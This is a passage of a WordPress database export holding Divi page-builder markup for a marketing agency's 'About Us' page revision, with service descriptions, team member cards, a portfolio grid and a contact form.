custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||60px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" hover_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"Dhiraj\" title_text=\"Founder WhatTheHell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Shubham Jha\" position=\"Marketing Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.jpg\" facebook_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"Shubham\" title_text=\"Artboard (2)\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Sachin\" position=\"Art Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-7.jpg\" facebook_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" hover_enabled=\"0\" locked=\"off\" alt=\"Sachin\" title_text=\"Art Director WhatTheHell?\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||56px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"56px||56px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-08 20:55:10','2020-08-08 20:55:10','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/392-revision-v1/',0,'revision','',0),(736,1,'2020-08-08 20:57:57','2020-08-08 20:57:57','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" parallax=\"on\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" 